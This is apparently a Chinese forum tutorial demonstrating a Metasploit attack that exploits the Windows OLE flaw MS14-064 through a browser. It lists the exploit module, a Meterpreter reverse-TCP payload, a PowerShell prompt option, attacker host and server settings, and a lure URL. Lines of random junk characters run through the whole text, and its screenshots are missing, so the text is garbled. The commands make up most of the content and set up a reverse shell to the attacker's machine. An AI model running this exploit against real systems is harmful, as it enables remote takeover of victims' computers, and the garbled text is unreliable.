$ o3 v$ f& h% P1 ?( C) X8 g
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
9 p- I6 q0 O. q, `3 C
9 }& Q# s' I, U% E7 S! L8 o
) n, F. n4 ], e7 u$ l 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
7 |" t% e/ y+ V9 q: m/ O# ^8 E
+ R3 O0 r( B% d7 A9 L: x
" M4 K |6 u2 x c) F# I 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp: h9 {& a7 f2 }9 v% G: \
4 i) ~2 K( M$ U z6 n
3 @# w- P4 H/ Y+ k set AllowPowershellPrompt true. u \- y% P3 _; {
2 l; @$ w1 E+ ?. Y+ m, q
) V- v$ H# h* c5 v9 m H! W
Set LHOST 192.168.0.109
* p, M0 H0 N# N1 |! @' F
6 X: A1 m0 y( a4 S& @ n: k
/ T6 Q$ w" D P! A
set SRVHOST 192.168.0.1090 G" B* K& Z4 u0 L* F
, k7 u3 |4 X. Y# Y; P! E9 [
! X) e6 x( O0 X$ _+ S$ G Set uripath share! f" T$ K( z5 m9 h- J
! t# T8 M# v4 k, Y1 l% G% Y3 ~# B. V* L. C, M" p! n
Set srvport 80
7 N: G7 I8 W9 ?# C: O/ U0 \
1 K9 L! ~' M& @: T( f: N
; M: G+ ?5 x6 J5 Z: K. q, n9 y
- @( s! a3 A9 z2 R% F- _
( Q# c. Q" V/ T1 |8 f8 S+ W
" p" L7 `- W0 J) e. [
6 _/ z8 z" e4 R. K& o# b7 D
) S& O0 `. {/ D0 @& r; G) D( o: A
! ^0 k0 \5 E9 a& [# P8 e d
! s9 a6 p- T5 l" M* g0 Y- q
d7 W7 d, {( y; k& C
7 }8 {( j# R1 C+ A! g% V% j
2 C4 x3 e3 h( f) L$ }
, |' R: V* u1 ^; p: B# Y$ J3 |7 W& Q. j' O
+ @8 J+ A& _' X, \% u3 o# S
0 H" y2 w1 Y6 m/ N5 {! i* G
: m, i" j& |- }6 } c 下面我们来访问本地地址如图:
8 x g/ ?) J' f$ T: W1 b
) S4 d1 u9 j, \! h, W
/ U7 E: k# a: Q; ~8 ^& E# v6 `
" L, ]$ Y0 N) a0 V+ Q8 b7 Y
4 Y) w+ s2 F! n3 V x5 Q
8 \1 H* C" d+ t, b( Z
1 Q& `9 l2 l* K. d( Z5 d
+ i8 ~1 H, p* S8 N! e6 @
+ D, b( E5 K7 Y& z: ?' H% b
- k O# @: T) o2 f